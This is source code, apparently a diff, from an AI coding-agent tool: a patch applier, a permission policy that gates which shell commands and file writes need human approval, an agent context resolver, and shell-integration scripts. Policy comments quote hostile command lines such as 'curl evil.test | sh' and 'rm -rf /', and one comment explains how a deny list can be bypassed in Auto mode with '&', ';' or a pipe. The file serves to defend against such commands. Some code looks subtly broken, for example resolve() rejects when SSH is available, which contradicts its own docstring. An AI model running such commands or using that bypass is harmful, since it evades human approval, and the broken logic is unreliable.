f"Those context lines appear {len(matches)} times in the file, and "
f"the line numbers in the hunk header do not point at any of them, "
f"so there is no way to tell which was meant. Include more "
f"unchanged lines around the change."
)
raise PatchError("") # Filled in by the caller, which knows the hunk number.
def apply(text: str, hunks: list[Hunk]) -> str:
"""The file with every hunk applied, or a PatchError naming the first that
would not.
Hunks are applied in order against a cursor, so one cannot match inside
territory an earlier one already consumed -- which is what a duplicated or
overlapping hunk would otherwise do, applying the same change twice.
"""
crlf = "\r\n" in text
lines = text.replace("\r\n", "\n").replace("\r", "\n").split("\n")
trailing = lines and lines[-1] == ""
if trailing:
lines.pop()
out: list[str] = []
cursor = 0
reached_end = False
for number, hunk in enumerate(hunks, start=1):
wanted = hunk.before
# A pure insertion names the line it goes *after*, not the line it
# replaces, so it is not off by one the way every other hunk is.
hint = hunk.old_start if hunk.old_count == 0 else max(hunk.old_start - 1, 0)
try:
at = _find(lines, wanted, hint, cursor)
except PatchError as exc:
raise _mismatch(number, hunk, lines, hint, exc.message) from None
out.extend(lines[cursor:at])
out.extend(hunk.after)
cursor = at + len(wanted)
reached_end = hunk.ends_without_newline and cursor >= len(lines)
out.extend(lines[cursor:])
result = "\n".join(out)
if trailing and not reached_end:
result += "\n"
return result.replace("\n", "\r\n") if crlf else result
def _mismatch(number: int, hunk: Hunk, lines: list[str], hint: int, why: str) -> PatchError:
"""The message the model retries from, so it has to say what is actually
there rather than only that something is wrong."""
if why:
return PatchError(
f"Hunk {number} did not apply. {why} Nothing was written.", hunk=number
)
expected = next((line[1:] for line in hunk.lines if line[:1] in (" ", "-")), "")
return PatchError(
f"Hunk {number} did not apply. It expects line {hint + 1} to be\n"
f" {expected}\n"
f"but the file has\n"
f"{_around(lines, hint)}\n"
f"and those lines are nowhere else nearby either. Nothing was written. "
f"Send a patch whose context matches what is printed above.",
hunk=number,
)
# How many lines either side of the hinted position to print back. Three, which
# is what a patch carries as context, so a model can read its next attempt
# straight off the message.
MISMATCH_WINDOW = 3
def _around(lines: list[str], hint: int) -> str:
"""The file as it actually is, around where the hunk expected to land.
One line was not enough. A model whose line numbers are two out reads "the
file has X", cannot see where X sits relative to what it wanted, and sends
the identical patch again -- which is most of the retry loop this tool
produces in practice. Numbered, because the numbers are what was wrong.
"""
if not lines:
return " (the file is empty)"
if hint >= len(lines):
start = max(0, len(lines) - MISMATCH_WINDOW)
shown = [f" {n + 1:>5} {lines[n]}" for n in range(start, len(lines))]
return "\n".join([*shown, f" (the file ends at line {len(lines)})"])
start = max(0, hint - MISMATCH_WINDOW)
end = min(len(lines), hint + MISMATCH_WINDOW + 1)
return "\n".join(
f"{'->' if n == hint else ' '} {n + 1:>5} {lines[n]}" for n in range(start, end)
)
def render(before: str, after: str, path: str, *, max_lines: int = 200) -> str:
"""A unified diff of one change, for the transcript.
Bounded here rather than at render time: this ends up in
`Message.tool_calls_json`, which is on the row forever and re-parsed on
every page load, and a generated file's diff can be larger than the file.
"""
# splitlines, not split("\n"): a file's own final newline would otherwise be
# an empty last element, which difflib renders as a stray context line at
# the bottom of every diff -- and as a spurious change whenever one side has
# it and the other does not. The trailing-newline difference is invisible
# here as a result, which is right for a display and irrelevant to the write.
lines = list(
difflib.unified_diff(
before.replace("\r\n", "\n").splitlines(),
after.replace("\r\n", "\n").splitlines(),
fromfile=f"a/{path}",
tofile=f"b/{path}",
lineterm="",
n=3,
)
)
if len(lines) > max_lines:
dropped = len(lines) - max_lines
lines = lines[:max_lines] + [f"… ({dropped} more lines)"]
return "\n".join(lines)
__all__ = ["MAX_DRIFT", "MAX_HUNKS", "Hunk", "PatchError", "apply", "parse", "render"]
-286
View File
@@ -1,286 +0,0 @@
"""What an agent chat is allowed to do without asking.
Four modes, one table, indexed by what a tool does to the world. Adding a mode
is a row; adding a risk class is a column. Anything that needs an `if mode ==`
somewhere else in the codebase is a sign this table is wrong rather than that
the table is insufficient.
The important thing about all of it: **this is consulted in the generation loop,
not written into the prompt.** A mode a model is merely told about is a mode a
model can be talked out of, and everything a model reads -- a web page, a
README, the output of a command it just ran -- is untrusted text that may be
trying to do exactly that.
"""
from __future__ import annotations
import re
from dataclasses import dataclass
from fnmatch import fnmatch
from lembas.services.tools import RISK_ASK, RISK_EXECUTE, RISK_READ, RISK_WRITE
MODE_MANUAL = "manual"
MODE_EDIT = "edit"
MODE_AUTO = "auto"
MODE_PLAN = "plan"
MODES = (MODE_MANUAL, MODE_EDIT, MODE_AUTO, MODE_PLAN)
MODE_LABELS = {
MODE_MANUAL: "Manual",
MODE_EDIT: "Edit",
MODE_AUTO: "Auto",
MODE_PLAN: "Plan",
}
MODE_HINTS = {
MODE_MANUAL: "Everything is shown to you before it happens.",
MODE_EDIT: "Files are read and written freely; commands are shown to you first.",
MODE_AUTO: "Nothing is shown to you first. Only for work you would do yourself.",
MODE_PLAN: "Reads freely, changes nothing, and finishes by proposing a plan.",
}
# What the *model* is told about the mode it is in. Different words from
# MODE_HINTS, which describes it to a person: this is about how to behave, and
# says the one thing that changes what a competent model does -- that being
# stopped for approval is normal and worth batching for.
MODE_GUIDANCE = {
MODE_MANUAL: (
"You are in **Manual** mode: everything you do is shown to them for "
"approval first. Expect to be interrupted, and say what you are about "
"to do before you do it."
),
MODE_EDIT: (
"You are in **Edit** mode: you may read and write files freely, but "
"every command is shown to them for approval first. Prefer reading and "
"writing files over shelling out where both would work."
),
MODE_AUTO: (
"You are in **Auto** mode: nothing is shown to them first. That is trust "
"rather than permission — be as careful as you would be if each step "
"were being watched, and stop to say so if you find yourself about to "
"do something you could not undo."
),
MODE_PLAN: (
"You are in **Plan** mode: read and explore freely, but change nothing. "
"Research before you propose anything — read the files, run the "
"read-only commands, look at what is actually there rather than at what "
"is usually there. If the scope is genuinely ambiguous, and only then, "
"ask with ask_user before planning rather than planning for the wrong "
"thing; put everything you need into one question. Then finish with "
"plan_submit: what you found, what the work is for, and the work itself "
"as phases of concrete tasks. Anything that writes or runs will be "
"stopped for approval, so do not rely on it."
),
}
ALLOW = "allow"
ASK = "ask"
# The whole feature. Read across a row to see what a mode means.
POLICY: dict[str, dict[str, str]] = {
MODE_MANUAL: {RISK_READ: ASK, RISK_WRITE: ASK, RISK_EXECUTE: ASK},
MODE_EDIT: {RISK_READ: ALLOW, RISK_WRITE: ALLOW, RISK_EXECUTE: ASK},
MODE_AUTO: {RISK_READ: ALLOW, RISK_WRITE: ALLOW, RISK_EXECUTE: ALLOW},
MODE_PLAN: {RISK_READ: ALLOW, RISK_WRITE: ASK, RISK_EXECUTE: ASK},
}
# A shell metacharacter makes a command line unmatchable, so no pattern may be
# applied to it. Without this, `git *` in an allow list also matches
# `git status; curl evil.test | sh`, which is the whole ballgame. That half is
# absolute and is what this constant exists for.
#
# The deny list is the other half, and it has been decided both ways. There was
# once a rule that an unmatchable line ASKed whenever a deny list existed at
# all, on the grounds that `shutdown -h now` asked while `shutdown -h now &`
# ran. It is gone: the shipped deny list is non-empty, so that rule made *every*
# compound command ask in Auto -- `cd build && make`, `pytest | tail`, anything
# with a pipe -- and a mode whose whole purpose is not asking asked about most
# real commands. It was not a security control anybody experienced as one; it
# was Auto appearing not to work.
#
# So an unmatchable line now falls through to the mode, and in Auto the mode is
# ALLOW. What that gives up, plainly: a deny pattern can be walked past with a
# trailing `&`, a `;` or a pipe. Auto is the only mode where this is reachable,
# because Manual, Edit and Plan all ASK on RISK_EXECUTE regardless. The allow
# list is untouched by the change and still cannot be matched at all.
#
# The upgrade that would restore both properties is to split a composed line on
# these metacharacters and check every segment against the deny list only. It is
# confined to `decide` and is worth doing; it is not done here.
_UNSAFE = re.compile(r"[;&|<>`$\n\\()]")
# Flags that turn a "read-only" command into one that writes or executes, on
# tools whose *name* is on somebody's allow list.
#
# `_UNSAFE` stops a command line being composed out of two commands. It does
# nothing about a single command that composes one itself, and several of the
# obvious read-only tools do: `find -exec cmd +` runs a program, `-fprintf`
# writes a file, `-delete` removes one, and `rg --pre` runs a preprocessor for
# every file it opens. None of those needs a character `_UNSAFE` refuses, so
# `find *` on an allow list -- which is what a subagent gets, in every mode --
# was arbitrary write and arbitrary execution wearing a read-only name.
#
# Refused here rather than trimmed from the allow list alone, because the list
# is the thing an administrator edits and "this one looks read-only" is exactly
# the reasoning that put `find *` there. A pattern cannot express "and no
# dangerous flags"; this can.
#
# Matched on the *normalised* line and word-bounded, so `docs/-exec-notes.md`
# is fine -- the flag has to stand alone as an argument.
#
# It does catch `grep -rn -- -delete src/`, where the word is a search term
# rather than a flag, and that is the right direction to be wrong in: a false
# refusal here means the call falls through to the policy table and asks, which
# costs one approval card. A false allow means an unattended helper writing
# files. Nothing is *blocked* by this -- a reader in Auto still gets it, and in
# any other mode they are shown it first, which is what they would want to be
# shown.
_ACTION = re.compile(
r"(?:^|\s)-(?:exec|execdir|ok|okdir|fprintf|fprint|fprint0|delete)(?=\s|$)"
r"|(?:^|\s)--(?:pre|search-zip|hostname-bin)(?=[\s=]|$)"
)
@dataclass(frozen=True)
class Decision:
verdict: str
reason: str = ""
@dataclass(frozen=True)
class Limits:
"""What one agent reply may spend.
Four axes because they fail differently. Wall clock stops a single slow
command eating an afternoon; `output_bytes` stops a model filling its own
context with build logs and having no room left to answer; and
`completion_tokens` stops one that keeps writing.
`steps` is the odd one out. It is a **runaway backstop, not a working
budget** -- an agent reply is meant to run until the task is finished, and a
step count low enough to be the thing that ends it is a count that ends it
halfway. It was 40, which is a working budget, and it was reached. Anything
that wants a real ceiling should set `completion_tokens`, which measures
what a long reply actually costs.
`completion_tokens` of 0 means no ceiling, the same convention `index_chars`
uses in the settings store.
"""
steps: int = 200
wall_seconds: float = 900.0
output_bytes: int = 1024 * 1024
completion_tokens: int = 200_000
def subject(tool_name: str, command: str = "") -> str | None:
"""What a pattern is matched against, or None when nothing may match it.
For everything but a command it is the tool name, so `file_read` in an
allow list means "reading files never asks". For `shell_run` it is the
command line, normalised -- unless it contains anything that composes two
commands into one, in which case no pattern is allowed to match at all.
"""
if tool_name != "shell_run":
return tool_name
raw = command or ""
# Checked BEFORE whitespace is normalised. Collapsing runs of whitespace
# first would turn "git status\nrm -rf /" into a single innocent-looking
# line and let it match `git *` -- a newline separates two commands exactly
# as a semicolon does.
if _UNSAFE.search(raw):
return None
line = " ".join(raw.split())
if _ACTION.search(line):
return None
return line or None
def _matches(patterns: tuple[str, ...], candidate: str | None) -> str:
if candidate is None:
return ""
for pattern in patterns:
if fnmatch(candidate, pattern):
return pattern
return ""
def decide(
*,
mode: str,
risk: str,
tool_name: str,
command: str = "",
allow: tuple[str, ...] = (),
deny: tuple[str, ...] = (),
) -> Decision:
"""What to do about one call.
The order is the design:
1. A deny wins before everything, **including Auto**. A deny list that Auto
ignores is not a deny list, it is a suggestion.
2. `ask` never resolves to allow. `ask_user` asks in every mode; that is
what the tool is for, and a mode that skipped it would answer the
model's question on the reader's behalf.
3. An allow-list hit runs it.
4. Otherwise the table.
A command line carrying a shell metacharacter matches neither list, so it
reaches the table and Auto runs it. See the note above `_UNSAFE` for what
that trades away and why.
An unrecognised mode is treated as Manual, not Auto: a row that predates a
rename has to fail towards asking.
"""
candidate = subject(tool_name, command)
hit = _matches(deny, candidate)
if hit:
return Decision(ASK, f"{hit}” is on the list of commands to always ask about.")
if risk == RISK_ASK:
return Decision(ASK, "")
if mode not in POLICY:
return Decision(ASK, f"{mode}” is not a mode I know, so I am asking.")
hit = _matches(allow, candidate)
if hit:
return Decision(ALLOW, f"{hit}” is on the list of things to allow.")
verdict = POLICY[mode].get(risk, ASK)
if verdict == ALLOW:
return Decision(ALLOW, "")
label = MODE_LABELS.get(mode, mode)
return Decision(ASK, f"{label} mode asks before anything that {_verb(risk)}.")
def _verb(risk: str) -> str:
return {
RISK_READ: "reads",
RISK_WRITE: "changes a file",
RISK_EXECUTE: "runs a command",
}.get(risk, "does this")
__all__ = [
"ALLOW",
"ASK",
"MODES",
"MODE_AUTO",
"MODE_EDIT",
"MODE_GUIDANCE",
"MODE_HINTS",
"MODE_LABELS",
"MODE_MANUAL",
"MODE_PLAN",
"POLICY",
"Decision",
"Limits",
"decide",
"subject",
]
-277
View File
@@ -1,277 +0,0 @@
"""What one agent chat is pointed at, resolved while a session is open.
Everything a runner needs travels in `AgentContext`: the machine, the decrypted
credential, the mode in force, and the two lists that adjust it. Nothing is
looked up later, for the reason `Endpoint` is a frozen copy of a `Connection`
and `ToolContext` carries an owner id rather than a `User` -- a generation
outlives the request that started it, and a detached instance is a trap.
The mode is read **once, at the start of the reply**, and deliberately does not
change under a reply already in flight. Somebody switching to Auto halfway
through must not retroactively approve what is already queued.
"""
from __future__ import annotations
import logging
from dataclasses import dataclass, field, replace
from typing import Any
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import KIND_AGENT, Chat, SshProfile, User
from lembas.services import settings_store
from lembas.services.agent import hosts, policy
from lembas.services.agent import ssh as ssh_service
from lembas.services.agent.base import Executor
from lembas.services.agent.policy import Limits
log = logging.getLogger(__name__)
@dataclass
class AgentContext:
"""The machine an agent chat acts on, and what it may do there."""
chat_id: str
label: str
project_dir: str
# The connection's id, carried so a runner can drop the project listing it
# has just invalidated. `index` is keyed on the connection and the
# directory, not on the chat -- two chats on one tree share a listing.
profile_id: str = ""
mode: str = policy.MODE_MANUAL
allow: tuple[str, ...] = ()
deny: tuple[str, ...] = ()
limits: Limits = field(default_factory=Limits)
# Per-command bounds, from the instance settings.
timeout: float = 60.0
max_timeout: float = 600.0
max_output: int = 64 * 1024
# The decrypted credential. Held here and nowhere else, and cleared by
# `generation` when the reply ends -- a finished Generation lingers five
# minutes so late followers get the final frames, and a private key should
# not linger with it.
spec: dict[str, Any] = field(default_factory=dict)
# Set only on the per-call copy handed to a runner whose call a person has
# just allowed. The runners re-check the mode as a backstop, and without
# this they would refuse the very thing that was approved -- the mode says
# "ask", and asking is exactly what happened.
approved: bool = False
# Absolute paths this reply has read. `file_edit` refuses a file that is not
# in here, because a patch written from memory against a file the model has
# not looked at is how a rewrite silently loses somebody's work.
#
# Here rather than on `Generation` for two reasons. Runners never see a
# Generation -- they get a `ToolContext`, which is a session-free snapshot
# precisely so nothing in a tool holds live state -- and a read path is a
# fact about the machine, which is what this class is.
#
# It is **shared with the approved copy**: `as_approved` is
# `dataclasses.replace`, which copies field references, so a path read
# through an approved call is visible here. That is wanted and is not
# obvious, so there is a test for it.
#
# It resets each reply, and that is correct rather than a limitation.
# `Message.tool_calls_json` is deliberately never replayed as context, so on
# the next turn the model does not have the file's contents either --
# requiring a re-read in the reply that edits is asking for something it
# needs anyway.
read_paths: set[str] = field(default_factory=set)
# The plan currently in force, seeded from `chat.plan_message_id` when this
# is resolved. Mutable and read/written in place by `plan_update`, for a
# reason that is not obvious: a runner cannot write the message row --
# `_persist` is the single writer -- so it returns the merged plan on its
# event and the loop carries it. Two updates in one reply would then both
# read the same stale plan from the database and the second would lose the
# first. This snapshot is what they actually merge into.
plan: dict[str, Any] = field(default_factory=dict)
# Whether commands may run detached. When off, `shell_run` is byte-for-byte
# what it always was and the `job_*` tools are not offered -- a command that
# times out is killed, as before. When on, a command can be launched in the
# background (or converted to one when it times out) and the model gets the
# tools to check on it. `on_timeout` is the sub-switch for the auto-convert.
background: bool = False
background_on_timeout: bool = True
# Whether a finished job wakes the model on its own, rather than only being
# seen when it next runs. Read by the wording here and by the watcher.
background_notify: bool = True
# Most jobs watched at once. A watcher is a periodic reconnect, so this is a
# real resource; past it a job still runs but is not watched or woken for.
background_max_jobs: int = 5
def executor(self) -> Executor:
return ssh_service.SshExecutor(self.spec, self.project_dir)
def clear(self) -> None:
self.spec = {}
def as_approved(self) -> AgentContext:
"""A copy of this context for one call a person has allowed."""
return replace(self, approved=True)
def _plan_of(db: DBSession, chat: Chat) -> dict[str, Any]:
"""The plan this chat is working to, or an empty dict.
One `db.get` by primary key -- the column exists to avoid a scan for "the
newest message carrying a plan", because this runs while a request is
waiting. The id is validated here rather than constrained in the schema, for
the reason the column's comment gives.
"""
from lembas.db.models import Message
from lembas.services import plans
if not chat.plan_message_id:
return {}
message = db.get(Message, chat.plan_message_id)
if message is None or message.chat_id != chat.id:
return {}
return plans.normalise(message.plan_json)
def profile_for(db: DBSession, chat: Chat, user: User | None) -> SshProfile | None:
"""The connection this chat is pointed at, if it is still usable.
Ownership is re-checked here rather than trusted from when the chat was
created: a profile can be deleted, disabled, or moved to a host whose key
has not been confirmed since, and any of those should stop the chat acting
rather than be discovered at the first command.
"""
if chat is None or chat.kind != KIND_AGENT or not chat.ssh_profile_id:
return None
profile = db.get(SshProfile, chat.ssh_profile_id)
if profile is None or not profile.enabled:
return None
if user is not None and profile.owner_id != user.id:
return None
# A row can predate a setting, so this is asked here rather than trusted
# from when the profile was saved: an administrator moving the switch to
# `off` has to stop the chats already pointed at loopback, not only the next
# one somebody tries to create. See services/agent/hosts.py.
if not hosts.usable(db, profile):
return None
return profile
def _allow_for(chat: Chat) -> tuple[str, ...]:
"""Imported inside `resolve` rather than at module scope.
`services/tools.py` imports this module's `resolve`, so a top-level import
back the other way is a cycle.
"""
from lembas.services import tools as tools_service
return tools_service.scoped_allow(chat)
def refresh(db: DBSession, agent: AgentContext) -> AgentContext:
"""Re-read the two things a person can change while a reply is running.
The mode and the chat's own allow list, and nothing else. Everything else on
the context is fixed for the life of a chat (the connection, the directory)
or is an instance setting nobody is editing mid-reply.
Called once per round rather than once per reply. The reply-long snapshot it
replaces made both controls do nothing until the next turn: switching to
Auto during a long agent reply went on asking about every call, and
"Always allow this" was accepted, written to the row, and then ignored for
the rest of the reply that had just asked. Both look exactly like a control
that does not work, because for that reply they were.
Once per *round* and not more often, because a round's calls are authorised
together: what is already queued was decided under the mode that was in
force when it was queued, and switching to Auto must not retroactively
approve it. Mutated in place -- `as_approved` copies field references, so a
replacement here would leave the approved copy of this round pointing at the
old one.
"""
chat = db.get(Chat, agent.chat_id)
if chat is None:
return agent
agent.mode = chat.agent_mode if chat.agent_mode in policy.MODES else policy.MODE_MANUAL
instance = settings_store.agents(db)
agent.allow = (*(instance.get("allow_default") or ()), *_allow_for(chat))
return agent
def _limits_for(db: DBSession, chat: Chat, values: dict[str, Any]) -> Limits:
"""What this chat's replies may spend.
A helper's chat is sized by its own settings rather than the instance's,
because a reply answering one delegated question is not the same shape of
work as the reply that asked it: it should run out of room long before its
parent does, and an agent chat's own numbers are deliberately generous
enough to run for a quarter of an hour. `output_bytes` is shared, being a
property of what a command can hand back rather than of who asked.
`or 0` is avoided on the completion ceiling in both branches: zero is how an
administrator says "no ceiling", and the accessors have already clamped it.
"""
if chat.parent_chat_id:
sub = settings_store.subagents(db)
return Limits(
steps=int(sub["max_rounds"]),
wall_seconds=float(sub["wall_seconds"]),
output_bytes=int(values.get("max_total_output_bytes") or 1024 * 1024),
completion_tokens=int(sub.get("max_completion_tokens", 60_000) or 0),
)
return Limits(
steps=int(values.get("max_steps") or 200),
wall_seconds=float(values.get("max_wall_seconds") or 900),
output_bytes=int(values.get("max_total_output_bytes") or 1024 * 1024),
completion_tokens=int(values.get("max_completion_tokens", 200_000) or 0),
)
def resolve(db: DBSession, chat: Chat, user: User | None) -> AgentContext | None:
"""This chat's agent setup, or None if it has none it can use.
None is the answer to every "no": not an agent chat, the feature switched
off, the connection gone or disabled, SSH not installed. Each of those means
the agent tools are not offered at all, which is better than offering a tool
that fails on its first call.
A profile whose host key has never been confirmed is deliberately *not* one
of them. The tools are offered and the failure is explicit, because "check
the connection and accept its fingerprint" is a thing the reader can act on,
while a silently missing tool is not.
"""
profile = profile_for(db, chat, user)
if profile is None:
return None
values = settings_store.agents(db)
if not values.get("enabled"):
return None
if ssh_service.available():
return None
return AgentContext(
chat_id=chat.id,
label=profile.label,
plan=_plan_of(db, chat),
project_dir=chat.project_dir or profile.default_dir or "",
profile_id=profile.id,
mode=chat.agent_mode if chat.agent_mode in policy.MODES else policy.MODE_MANUAL,
# The instance's list, plus whatever this chat's reader has said
# "always" to on a card. Never the other way round for the deny list:
# a chat cannot un-deny anything, and `decide` consults deny first
# regardless.
allow=(*(values.get("allow_default") or ()), *_allow_for(chat)),
deny=tuple(values.get("deny_default") or ()),
limits=_limits_for(db, chat, values),
timeout=float(values.get("default_timeout") or 60),
max_timeout=float(values.get("max_timeout") or 600),
max_output=int(values.get("max_output_bytes") or 64 * 1024),
background=bool(values.get("background_enabled")),
background_on_timeout=bool(values.get("background_on_timeout", True)),
background_notify=bool(values.get("background_notify", True)),
background_max_jobs=int(values.get("background_max_jobs") or 5),
spec=ssh_service.spec_from(profile),
)
__all__ = ["AgentContext", "profile_for", "resolve"]
-401
View File
@@ -1,401 +0,0 @@
"""Knowing where one command ends and the next begins, in the terminal panel.
Without this the panel can offer "the last forty rows of the screen", which is
hard-wrapped at the terminal's width with no way to tell a wrap from a newline.
That is not something to hand a model and call it the output of a command.
So the shell is given hooks that emit invisible markers around the prompt, the
command and its result -- OSC 133, which is what VS Code, WezTerm and Ghostty
all use, plus two of VS Code's private codes for the things 133 has no room
for. A real terminal that understands 133 is not confused by ours, and one that
does not consumes and discards them, which is why the bytes are fanned out to
the browser unchanged.
**Three things about the mechanism.**
The integration is written by the PTY command string itself, with `printf`.
sshd runs that string through `$SHELL -c`, so it can branch on the shell's own
name and needs no probe, no second channel and no writable `$HOME`. Passing it
through the environment does not work: sshd's `AcceptEnv` is `LANG LC_*` on
every distribution anybody runs, so the variable is dropped silently -- and
bash reads `$BASH_ENV` only when non-interactive anyway. Feeding `source ` in
as keystrokes does work, and races a slow `.zshrc`, echoes into the scrollback,
and lands in shell history with no portable way to remove it.
Nothing needs hiding, and that is the point of choosing this mechanism. The
setup runs before the shell exists and never writes to the PTY's *input* side,
so there is nothing for the tty to echo. The first byte a viewer sees is the
first byte of their own prompt.
There is deliberately no `133;B`. It has to live at the end of `PS1`, and any
theme that rebuilds the prompt in a hook drops it silently every time. Every
marker here comes from a shell hook instead, so none of them depends on a
prompt string surviving somebody's dotfiles.
**Markers are advisory.** A program can print `\\e]133;D;0\\a` and move a
boundary. That is not a security problem -- the captured text is sanitised and
fenced either way, and a program could already print anything on screen -- but
nobody should later try to "validate" them.
"""
from __future__ import annotations
import re
from collections.abc import Callable
# Everything ours is under these two. 133 is FinalTerm's de-facto convention;
# 633 is VS Code's private space, borrowed because the raw stream carries the
# *echoed* command with readline's editing escapes in it and is not
# recoverable, and there is no standard code for "here is the command line".
MARK_PROMPT = "A" # 133;A -- a prompt is about to be drawn
MARK_OUTPUT = "C" # 133;C -- output starts here
MARK_DONE = "D" # 133;D;<exit>
MARK_COMMAND = "E" # 633;E;<escaped command>
MARK_CWD = "P" # 633;P;Cwd=<escaped path>
MARK_READY = "LEMBAS" # 633;LEMBAS;<shell>;1
# A marker longer than this is not one of ours. `cat` of a binary file produces
# stray ESC ] regularly, and without a bound one of them would swallow the rest
# of the session into a buffer that never emptied.
MAX_MARKER_BYTES = 8 * 1024
_ESC = 0x1B
_BEL = 0x07
# --- The snippets ------------------------------------------------------------
# `__lembas_esc` exists because an OSC payload may contain no BEL and no ESC
# (either would end it ambiguously) and no ';' (which would split the fields).
# Everything else rides through. It is also what lets `base.clean_output`'s
# existing OSC pattern swallow a whole marker in one bite.
BASH_RC = r"""
# LLeMbas shell integration.
#
# --rcfile replaces bash's normal startup files rather than adding to them, so
# bash's login sequence is reproduced here, in bash's own order, and nothing
# anybody has in a dotfile is skipped.
if [ -r /etc/profile ]; then . /etc/profile; fi
for __lembas_rc in "$HOME/.bash_profile" "$HOME/.bash_login" "$HOME/.profile"; do
if [ -r "$__lembas_rc" ]; then . "$__lembas_rc"; break; fi
done
unset __lembas_rc
if [ -r "$HOME/.bashrc" ]; then . "$HOME/.bashrc"; fi
__lembas_esc() {
local s=${1//\\/\\\\}
s=${s//;/\\x3b}; s=${s//$'\n'/\\x0a}; s=${s//$'\r'/\\x0d}
s=${s//$'\e'/\\x1b}; s=${s//$'\a'/\\x07}
builtin printf '%s' "$s"
}
__lembas_emit() {
if [ -n "$__lembas_running" ]; then
builtin printf '\e]133;D;%s\a' "${__lembas_last:-0}"
__lembas_running=
__lembas_have=
fi
builtin printf '\e]633;P;Cwd=%s\a' "$(__lembas_esc "$PWD")"
builtin printf '\e]133;A\a'
__lembas_armed=1
}
# $BASH_COMMAND is the current *simple* command, so `a | b` would give "a".
# `history 1` is the whole line as typed, which is what somebody would
# recognise; it falls back when history is off.
__lembas_line() {
local h
h=$(HISTTIMEFORMAT='' builtin history 1 2>/dev/null) || {
builtin printf '%s' "$BASH_COMMAND"; return; }
if [[ $h =~ ^[[:space:]]*[0-9]+[[:space:]]+(.*)$ ]]; then
builtin printf '%s' "${BASH_REMATCH[1]}"
else
builtin printf '%s' "$BASH_COMMAND"
fi
}
# The exit status is captured *in the DEBUG trap*, not in PROMPT_COMMAND.
#
# This is the one genuinely subtle thing in the file. DEBUG fires before every
# simple command -- including each command inside PROMPT_COMMAND -- so anything
# reading $? from there has already had it overwritten by whatever ran a moment
# earlier, and by this trap's own command substitution. The first DEBUG firing
# after the user's command is the last place the real status exists, so it is
# taken there and held until the prompt emits it.
#
# `__lembas_have` is what stops the later firings (the ones inside
# PROMPT_COMMAND) overwriting it, and `return $__s` puts $? back so nothing
# downstream sees a status this trap invented.
__lembas_debug() {
local __s=$?
if [ -n "$__lembas_running" ] && [ -z "$__lembas_have" ]; then
__lembas_last=$__s
__lembas_have=1
fi
if [ -n "$__lembas_armed" ]; then
__lembas_armed=
builtin printf '\e]633;E;%s\a' "$(__lembas_esc "$(__lembas_line)")"
builtin printf '\e]133;C\a'
__lembas_running=1
fi
return $__s
}
trap '__lembas_debug' DEBUG
# Appended, so anything already there still runs and runs first.
if [ -n "${BASH_VERSINFO[0]}" ] && [ "${BASH_VERSINFO[0]}" -ge 5 ] \
&& [ "${PROMPT_COMMAND@a}" = "a" ]; then
PROMPT_COMMAND=("${PROMPT_COMMAND[@]}" __lembas_emit)
else
PROMPT_COMMAND="${PROMPT_COMMAND:+$PROMPT_COMMAND; }__lembas_emit"
fi
builtin printf '\e]633;LEMBAS;bash;1\a'
# Self-deleting: bash has read the whole file by the time this runs, and one
# left in /tmp that a later shell might source is worse than any benefit.
rm -rf -- "$(dirname -- "${BASH_SOURCE[0]}")" 2>/dev/null
"""
# zsh re-reads $ZDOTDIR before *each* startup file, so every shim points it back
# at the user's directory, sources their file, and takes it again -- otherwise
# zsh finds the user's .zshrc and ours never loads.
#
# `LEMBAS_USER_ZDOTDIR` is passed in on the exec line and must not be guessed
# here. By the time .zshenv runs, `$ZDOTDIR` is already *our* directory, so a
# `${ZDOTDIR:-$HOME}` fallback in this file captures the wrong path and the
# shim ends up sourcing itself -- which looks like it works, right up to the
# point somebody notices none of their own configuration is loaded.
_ZSH_SHIM = r"""
: ${LEMBAS_USER_ZDOTDIR:=$HOME}
ZDOTDIR=$LEMBAS_USER_ZDOTDIR
[[ -r $ZDOTDIR/%(file)s ]] && source $ZDOTDIR/%(file)s
LEMBAS_USER_ZDOTDIR=$ZDOTDIR
ZDOTDIR=$LEMBAS_DIR
"""
ZSH_ENV = _ZSH_SHIM % {"file": ".zshenv"}
ZSH_PROFILE = _ZSH_SHIM % {"file": ".zprofile"}
ZSH_RC = (
_ZSH_SHIM % {"file": ".zshrc"}
+ r"""
__lembas_esc() {
local s=${1//\\/\\\\}
s=${s//;/\\x3b}; s=${s//$'\n'/\\x0a}; s=${s//$'\r'/\\x0d}
s=${s//$'\e'/\\x1b}; s=${s//$'\a'/\\x07}
builtin print -rn -- $s
}
__lembas_precmd() {
local __s=$?
if [[ -n $__lembas_running ]]; then
builtin printf '\e]133;D;%s\a' $__s
__lembas_running=
fi
builtin printf '\e]633;P;Cwd=%s\a' "$(__lembas_esc $PWD)"
builtin printf '\e]133;A\a'
}
# $1 is the line as typed, before alias and glob expansion -- what somebody
# would recognise. $2 and $3 are progressively more expanded and less useful.
__lembas_preexec() {
builtin printf '\e]633;E;%s\a' "$(__lembas_esc $1)"
builtin printf '\e]133;C\a'
__lembas_running=1
}
# Prepended, not appended: whichever precmd runs first is the only one that
# sees the real $?, and a theme's hook will have clobbered it by the time a
# later one runs.
precmd_functions=(__lembas_precmd $precmd_functions)
preexec_functions=(__lembas_preexec $preexec_functions)
builtin printf '\e]633;LEMBAS;zsh;1\a'
"""
)
ZSH_LOGIN = (
_ZSH_SHIM % {"file": ".zlogin"}
+ r"""
# The last file zsh reads, so this is where ZDOTDIR goes back for good.
ZDOTDIR=$LEMBAS_USER_ZDOTDIR
[[ -n $LEMBAS_DIR ]] && rm -rf -- $LEMBAS_DIR
unset LEMBAS_DIR LEMBAS_USER_ZDOTDIR
"""
)
def quote(value: str) -> str:
"""A single-quoted shell word, with embedded quotes escaped."""
return "'" + value.replace("'", "'\\''") + "'"
def command_for(project_dir: str, *, integrate: bool = True) -> str | None:
"""What the PTY runs.
Returns None for the account's plain login shell in the one case that has
always returned it -- no project directory and no integration -- so the
existing behaviour is byte for byte what it was.
`$SHELL -c` is what sshd puts this through, so it is POSIX sh and branches
on the shell's own name. Anything that is not bash or zsh falls out of the
`case` into exactly the line that was here before, because a terminal that
works without markers is worth more than markers that break a terminal.
Every step is `2>/dev/null`, so a full `/tmp` or a read-only home costs the
markers and nothing else.
"""
cd = f"cd {quote(project_dir)} 2>/dev/null; " if project_dir else ""
if not integrate:
if not project_dir:
return None
return f"{cd}exec ${{SHELL:-/bin/sh}} -l"
return (
f"{cd}umask 077; "
# mkdir -m 700 fails on a path that already exists, which is what makes
# the fallback safe when mktemp is missing.
'__L=$(mktemp -d 2>/dev/null) || { '
'__L=${TMPDIR:-/tmp}/.lembas-$$-$RANDOM; mkdir -m 700 "$__L"; }; '
"case ${SHELL##*/} in "
